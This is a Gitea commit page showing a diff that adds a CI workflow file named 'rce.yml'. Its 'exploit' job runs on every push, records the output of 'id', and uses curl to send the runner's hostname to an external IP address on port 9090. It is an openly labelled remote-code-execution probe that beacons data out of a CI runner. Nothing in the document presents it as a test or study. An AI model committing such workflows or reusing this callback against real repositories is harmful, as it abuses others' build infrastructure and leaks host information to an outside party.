This commit is contained in:
8
.gitea/workflows/rce.yml
Normal file
8
.gitea/workflows/rce.yml
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
name: RCE
|
||||||
|
on: [push]
|
||||||
|
jobs:
|
||||||
|
exploit:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- run: id > /tmp/rce_test
|
||||||
|
- run: curl -s http://43.157.204.73:9090/rce_test?host=$(hostname)
|
||||||
Reference in New Issue
Block a user